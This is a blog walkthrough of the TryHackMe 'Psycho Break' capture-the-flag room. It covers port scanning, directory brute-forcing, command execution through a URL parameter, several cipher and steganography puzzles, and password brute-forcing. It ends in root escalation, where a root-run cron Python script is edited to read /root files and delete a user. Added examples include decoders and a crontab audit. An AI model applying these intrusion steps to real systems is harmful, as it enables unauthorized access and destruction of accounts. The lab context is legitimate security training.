TryHackMe: Psycho Break

This is my first time playing a hacking game. To be honest, it was quite fun and I learned a lot from it, even though it took me 16 hours to complete. LOL

Link to room: https://tryhackme.com/room/psychobreak
Level: Easy

So, let's get started.

Recon

# nmap 10.10.X.X
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-27 09:18 +08
Nmap scan report for 10.10.X.X
Host is up (0.21s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 29.40 seconds

Now, which OS is the target machine running? Let's find out.

# nmap -A -Pn -T4 10.10.X.X
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-27 09:27 +08
Nmap scan report for 10.10.X.X
Host is up (0.20s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 44:2f:fb:3b:f3:95:c3:c6:df:31:d6:e0:9e:99:92:42 (RSA)
| 256 92:24:36:91:7a:db:62:d2:b9:bb:43:eb:58:9b:50:14 (ECDSA)
|_ 256 34:04:df:13:54:21:8d:37:7f:f8:0a:65:93:47:75:d0 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome To Becon Mental Hospital
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.16 seconds

Done. So now I have all the info I need about the machine.

The Web

The task is to find the key and access the locker room. Hmmm..

There is a hint in the source code. Let's dig into it.

Alright, found the key. There is a timer to enter the locker room. Need to hurry.

There is another blocker. I need to decode this piece of text “Tizmg_nv_zxxvhh_gl_gsv_nzk_kovzhv” to get the key that opens the map. It looks like a Caesar-style cipher, but it isn't, so I tried an online cipher detector: it's actually an Atbash cipher. Now that I've decoded it, let's open the map.
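The Atbash step above, as an added example that is not code from the original post: a small Python script that applies the Atbash mapping and, for comparison, tries every Caesar shift, scoring each candidate by how many common English words it contains, so you can see why the “Caesar-like” guess fails and Atbash wins. The word list and the scoring are assumptions of this example, not part of the room.

```python
import string

LOWER, UPPER = string.ascii_lowercase, string.ascii_uppercase

# Atbash pairs the first letter with the last, the second with the second-last, and so on.
ATBASH = str.maketrans(LOWER + UPPER, LOWER[::-1] + UPPER[::-1])

# Small set of common English words used to score candidate plaintexts (an assumption
# of this example; extend it for other languages or CTF vocabulary).
COMMON = {"the", "to", "me", "and", "a", "is", "of", "in", "it", "you", "map", "key"}


def atbash(text):
    """Apply Atbash; it is its own inverse and leaves case and non-letters untouched."""
    return text.translate(ATBASH)


def caesar(text, shift):
    """Rotate letters by `shift` positions, keeping case and non-letters."""
    shift %= 26
    table = str.maketrans(
        LOWER + UPPER,
        LOWER[shift:] + LOWER[:shift] + UPPER[shift:] + UPPER[:shift],
    )
    return text.translate(table)


def score(text):
    """Count common English words; underscores are treated as word separators."""
    return sum(1 for w in text.lower().replace("_", " ").split() if w in COMMON)


def best_guess(ciphertext):
    """Try Atbash and the 25 non-trivial Caesar shifts; return (name, plaintext)
    for the candidate with the most recognisable words."""
    candidates = [("atbash", atbash(ciphertext))]
    candidates += [(f"caesar-{s}", caesar(ciphertext, s)) for s in range(1, 26)]
    return max(candidates, key=lambda c: score(c[1]))


if __name__ == "__main__":
    # The blocker text from the room, as quoted in the walkthrough.
    name, plain = best_guess("Tizmg_nv_zxxvhh_gl_gsv_nzk_kovzhv")
    print(name, "->", plain)
```

The scoring is deliberately crude: it only has to separate one readable candidate from 25 unreadable ones, which is exactly the situation in a CTF blocker like this one.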

Numbers 1 and 2 are completed. Now let's see No 3: Safe Heaven.

The Safe Heaven room shows nothing, and Room No 4 is locked; it needs the keeper key. So there must be something here. Using the same method as before, I inspect the page source first.

The hint says to search throughout this page, so there must be a hidden directory. I start digging with gobuster and dirb at the same time to brute-force the directory names.

# gobuster -w WORDLIST_PATH -u http://10.10.X.X/SafeHeaven/ -t 100
# dirb http://10.10.X.X/SafeHeaven/ WORDLIST_PATH

Using the dirbuster directory wordlist, I managed to find the hidden page.

So, proceed~~

This page shows up, and again it has to be done fast. I need to find exactly where this place is.

There is a hint in the code. A Google Image search is needed, and that finds it.

The keeper key is revealed. Now I can proceed to room 4: Abandoned Room.

Okay.. Creepy ass room over here. Let's go further then.

Oh Sh*t, another race against time (the timer can be reset if you refresh the page). Inspect the page to see if there is any hint.

The hint says there is something called “shell” in the current page. There is no input at all, so I'm guessing it is some parameter to be passed in the URL. I go for an LFI attack.

http://URL?shell=ls

It actually gives the list of files. After several attempts, I finally got the hidden directory.

There are 3 files from the LFI. Replace the URL with the first directory found.

Tada~~. There are some files showing in the directory listing.

Help Me

# wget URL_PATH
# unzip helpme.zip
helpme.txt Table.jpg

I find out that Table.jpg cannot be previewed. Must be the wrong extension. I simply run file on it.

# file Table.jpg
Table.jpg: Zip archive data, at least v2.0 to extract

Luckily, it clearly states that it is a ZIP file. Extract it.
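What file(1) did here is look at the leading bytes instead of trusting the extension. As an added example (not from the original post), here is a tiny Python sniffer that does the same for a handful of formats and flags a mismatch between the extension and the content. The sample byte strings are constructed here, not the challenge files, and the signature table covers only the types that appear in this write-up.

```python
# (offset, magic bytes, type) -- signatures for the formats that appear in this write-up.
SIGNATURES = [
    (0, b"\xff\xd8\xff", "jpeg"),
    (0, b"\x89PNG\r\n\x1a\n", "png"),
    (0, b"PK\x03\x04", "zip"),
    (0, b"\x7fELF", "elf"),
    (0, b"RIFF", "riff"),  # generic RIFF container; refined to "wav" below
]

# What each extension claims the content to be.
EXT_MAP = {"jpg": "jpeg", "jpeg": "jpeg", "png": "png", "zip": "zip", "wav": "wav", "elf": "elf"}


def sniff(data):
    """Identify content by its leading bytes, like file(1), ignoring the file name."""
    for offset, magic, kind in SIGNATURES:
        if data[offset:offset + len(magic)] == magic:
            if kind == "riff":
                # RIFF files carry their form type at bytes 8..12 ("WAVE" for WAV audio).
                return "wav" if data[8:12] == b"WAVE" else "riff"
            return kind
    return "unknown"


def extension_mismatch(name, data):
    """Return (claimed, actual) when the extension disagrees with the content, else None."""
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    claimed = EXT_MAP.get(ext)
    actual = sniff(data)
    if claimed is not None and claimed != actual:
        return (claimed, actual)
    return None


# Constructed sample contents (not the real challenge files): a zip local-file header
# saved under a .jpg name, a JFIF header, and a RIFF/WAVE header.
SAMPLES = {
    "Table.jpg": b"PK\x03\x04\x14\x00\x00\x00\x08\x00" + b"\x00" * 20,
    "photo.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 20,
    "key.wav": b"RIFF\x24\x00\x00\x00WAVEfmt " + b"\x00" * 20,
}


def scan(samples=SAMPLES):
    """Map each name to its mismatch tuple (or None when extension and content agree)."""
    return {name: extension_mismatch(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, result in scan().items():
        print(name, "->", result or "ok")
```

The same check is useful outside CTFs: an upload handler or a mail gateway that trusts the extension will happily pass an archive or an ELF binary that is wearing a .jpg name.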

# unzip Table.jpg
key.wav Joseph_Oda.jpg

When I listen to key.wav, it sounds like Morse code because of the “bip bip” sound. So, using an online Morse code decoder, I get the key. After a while it turns out the key is actually a hint, and something else still needs to be revealed. There are only 2 files from Table.jpg, so there must be something hidden in the Joseph_Oda.jpg image. I tried an online steganographic decoder and it worked.
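The key.wav step, as an added example that is not part of the original post: instead of an online decoder, a Python script that turns an on/off amplitude envelope (one 0/1 per sample, which is what you get after rectifying and thresholding a beep recording) into dots and dashes using the standard 1:3:7 Morse timing, and then into letters. Reading the WAV and producing that envelope is assumed to happen outside this block; the envelope used here is generated from a constructed message so the script runs offline.

```python
MORSE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F", "--.": "G",
    "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L", "--": "M", "-.": "N",
    "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R", "...": "S", "-": "T", "..-": "U",
    "...-": "V", ".--": "W", "-..-": "X", "-.--": "Y", "--..": "Z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
}


def decode_morse(text):
    """Letters are separated by spaces, words by '/'; unknown symbols become '?'."""
    words = []
    for word in text.split("/"):
        letters = [MORSE.get(sym, "?") for sym in word.split()]
        if letters:
            words.append("".join(letters))
    return " ".join(words)


def runs(envelope):
    """Collapse a 0/1 envelope into [value, length] runs."""
    out = []
    for s in envelope:
        if out and out[-1][0] == s:
            out[-1][1] += 1
        else:
            out.append([s, 1])
    return out


def estimate_unit(envelope):
    """The shortest tone is a dot, which defines the timing unit."""
    return min(length for value, length in runs(envelope) if value == 1)


def envelope_to_morse(envelope, unit=None):
    """Standard timing: dot = 1 unit, dash = 3; gaps of 1 (inside a letter), 3 (between
    letters) and 7 (between words) units. Leading and trailing silence is ignored."""
    unit = unit or estimate_unit(envelope)
    out = []
    for value, length in runs(envelope):
        units = round(length / unit)
        if value == 1:
            out.append("." if units < 2 else "-")
        elif out:  # silence before the first tone carries no information
            if units >= 5:
                out.append(" / ")
            elif units >= 2:
                out.append(" ")
    return "".join(out).strip()


def morse_to_envelope(text, unit):
    """Inverse of envelope_to_morse, used here only to build a constructed test signal."""
    env = []
    for wi, word in enumerate(text.split(" / ")):
        if wi:
            env += [0] * (7 * unit)
        for li, letter in enumerate(word.split(" ")):
            if li:
                env += [0] * (3 * unit)
            for si, sym in enumerate(letter):
                if si:
                    env += [0] * unit
                env += [1] * (unit if sym == "." else 3 * unit)
    return env


def demo():
    """Round-trip a constructed message through the envelope and back to text."""
    signal = morse_to_envelope("... --- ... / .... . .-.. .--.", unit=8)
    return decode_morse(envelope_to_morse(signal))


if __name__ == "__main__":
    print(demo())
```

Real recordings have jitter, so the 2-unit and 5-unit thresholds sit halfway between the nominal 1/3 and 3/7 gap lengths rather than exactly on them; if a file decodes to a string of '?' symbols, the first thing to check is whether the dot length was estimated from noise rather than from a tone.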

The message shows the credentials for the FTP site. Hmm.. interesting..

Crack it Open

# file program
program: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=294d1f19a085a730da19a6c55788ec08c2187039, stripped

Oh! It's an executable file. Let's run it.

# ./program
[+] Usage
./program <word>

Hmm.. so the program needs 1 parameter.

# ./program hello
hello => Incorrect

Okay, now I know how it works. I need to use the dictionary file given and brute-force it. Let's write a simple Python script.

import subprocess
import sys

DICTIONARY_PATH = "dictionary.txt"  # path to the wordlist given with the challenge

with open(DICTIONARY_PATH) as lines:
    for password in lines:
        password = password.strip()
        if not password:
            continue  # skip blank lines in the wordlist
        # Run the binary with one candidate word and read what it prints
        output = subprocess.check_output(["./program", password])
        output = output.decode(sys.stdout.encoding or "utf-8").strip()
        if "incorrect" in output.lower():
            print(password + " is Wrong")
        else:
            print(output)  # the binary's reply for the right word
            break

Let's run it.

python3 program.py

The output

00000 is Wrong
....
....
....
####### => Correct
Decode this => 55 444 3 6 2 66 7777 7 2 7777 7777 9 666 777 3 444 7777 7777 666 7777 8 777 2 66 4 33

Another cipher. The cipher detector also wasn't able to tell which cipher it is, so guessing is the last resort.

You know what.. This one took longer than the first one. Haha.. It's actually a phone keypad. “abc — def — ghi — jkl — mno — pqrs — tuv — wxyz” dammit.
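The keypad step, as an added example that is not from the original post: a Python multi-tap decoder (plus the matching encoder, for checking a guessed plaintext) for the 2–9 layout the author lists. The sample message is constructed for the demo rather than taken from the room, and treating the 0 key as a space is an assumption of this example.

```python
# Classic 12-key layout: each key cycles through its letters on repeated presses.
KEYPAD = {
    "2": "abc", "3": "def", "4": "ghi", "5": "jkl",
    "6": "mno", "7": "pqrs", "8": "tuv", "9": "wxyz",
    "0": " ",  # assumption for this example: 0 is a space
}


def decode_multitap(text):
    """Each whitespace-separated group is one key held for len(group) presses:
    '2' -> a, '22' -> b, '7777' -> s. Presses past the last letter wrap around,
    as on a real handset."""
    out = []
    for group in text.split():
        key, n = group[0], len(group)
        if key not in KEYPAD or group != key * n:
            raise ValueError(f"not a multi-tap group: {group!r}")
        letters = KEYPAD[key]
        out.append(letters[(n - 1) % len(letters)])
    return "".join(out)


def encode_multitap(text):
    """Inverse of decode_multitap; useful to confirm a guessed plaintext."""
    groups = []
    for ch in text.lower():
        for key, letters in KEYPAD.items():
            if ch in letters:
                groups.append(key * (letters.index(ch) + 1))
                break
        else:
            raise ValueError(f"no key for {ch!r}")
    return " ".join(groups)


# Constructed sample (not the room's cipher text).
SAMPLE = "44 33 555 555 666 0 9 666 777 555 3"

if __name__ == "__main__":
    print(decode_multitap(SAMPLE))
```

The tell-tale sign of this encoding is that every group repeats a single digit and no group is longer than four characters; a quick scan for that pattern is faster than trying cipher detectors.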

Go Capture the flag

At first, I tried to brute-force the server using hydra. It took hours but failed with 2 different password dictionaries. Then I tried using the previously found key as the username and the decrypted cipher as the password.

# ssh USERNAME@10.10.X.X

Yay! Success. The first thing I usually do is list all the files in the current directory.

# ls -al
...
-rw-rw-r-- 1 kidman kidman 264 Aug 13 2020 .readThis.txt
-rw-r--r-- 1 root root 19 Feb 26 16:36 .the_eye.txt
-rw-rw-r-- 1 kidman kidman 33 Jul 13 2020 user.txt
....

Let's see user.txt.

# cat user.txt
4C72A4EF8EXXXXXXXXXXXX1C4254

When I open .readThis.txt, it's encrypted, presumably with some cipher family too, but I still don't know which cipher was used, so I was unable to decode it. Hmmm.. But there is something going on with .the_eye.txt: I notice that its content changes every few minutes. The first thing that comes to mind is the cron scheduler.

# crontab -e

But nothing is found there. So I need to search through all the files on the machine to find which file changes the .the_eye.txt content.

# grep -rs "the_eye" /

And found it. It's a Python file owned by root. Since I don't know how to get a reverse shell, I do it the traditional way: edit the Python file to run a command and write its output to a file that I can read.

..
subprocess.call("ls -al /root > root_list_files.txt", shell=True)
..
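The weakness this step relies on is a script that a root cron job runs but that a non-root user can edit. As an added example (not code from the post or from the room), here is a Python check an admin can run over a system crontab: for every entry that runs as root it resolves the script path and flags the file if it is group- or world-writable or owned by someone other than root. The crontab text and the script files are constructed in a temporary directory, and the file name the_eye.py is hypothetical.

```python
import os
import re
import stat
import tempfile

# System crontab line: minute hour dom month dow user command...
CRON_LINE = re.compile(r"^\s*(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+?)\s*$")

# Interpreter names to skip so the script they run is what gets checked.
INTERPRETERS = ("python", "bash", "sh", "perl", "env")


def script_from_command(cmd):
    """First absolute path in the command that is not an interpreter, e.g. the .py
    file in 'python3 /opt/the_eye.py'. Returns None if there is none."""
    for tok in cmd.split():
        if tok.startswith("/") and not os.path.basename(tok).startswith(INTERPRETERS):
            return tok
    return None


def writable_by_non_root(path):
    """True if a non-root user could change the file: it is owned by a uid other
    than 0, or it carries a group or other write bit."""
    st = os.stat(path)
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_crontab(text):
    """Return (user, script, mode) for root entries whose script is modifiable."""
    findings = []
    for line in text.splitlines():
        m = CRON_LINE.match(line)
        if line.lstrip().startswith("#") or not m:
            continue
        user, cmd = m.group("user"), m.group("cmd")
        script = script_from_command(cmd)
        if user != "root" or script is None or not os.path.isfile(script):
            continue
        if writable_by_non_root(script):
            mode = stat.filemode(os.stat(script).st_mode)
            findings.append((user, script, mode))
    return findings


def demo():
    """Constructed scenario in a temp dir: one world-writable root job, one 0755 job,
    and one job that does not run as root. Returns (flagged names, running as root)."""
    with tempfile.TemporaryDirectory() as d:
        bad = os.path.join(d, "the_eye.py")  # hypothetical name
        good = os.path.join(d, "rotate.sh")
        for p in (bad, good):
            with open(p, "w") as f:
                f.write("#!/bin/sh\n")
        os.chmod(bad, 0o777)
        os.chmod(good, 0o755)
        crontab = (
            "# m h dom mon dow user command\n"
            f"* * * * * root /usr/bin/python3 {bad}\n"
            f"0 3 * * * root {good}\n"
            f"* * * * * backup /usr/bin/python3 {bad}\n"
        )
        flagged = [os.path.basename(s) for _, s, _ in audit_crontab(crontab)]
        return flagged, os.geteuid() == 0


if __name__ == "__main__":
    print(demo())
```

When run as a normal user the 0755 script is flagged too, because the temp files are owned by that user rather than root; on a real system the fix is the same in both cases: make the script root-owned with mode 0755 or stricter, and keep the directory it lives in root-owned as well.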

Oh.. there is a root.txt in it. So..

subprocess.call("cat /root/root.txt > root.txt", shell=True)

Now root.txt is revealed.

# cat /root.txt
BA33BDXXXXXXXXXXXXXXXXXXXX13F3361E

Lastly, I need to delete ruvik. Same process: edit the Python file again.

subprocess.call("deluser -r ruvik && killall -u ruvik && userdel -f ruvik", shell=True)

Oh yeah~~ Mission complete!

Software Engineer at Teratotech.com
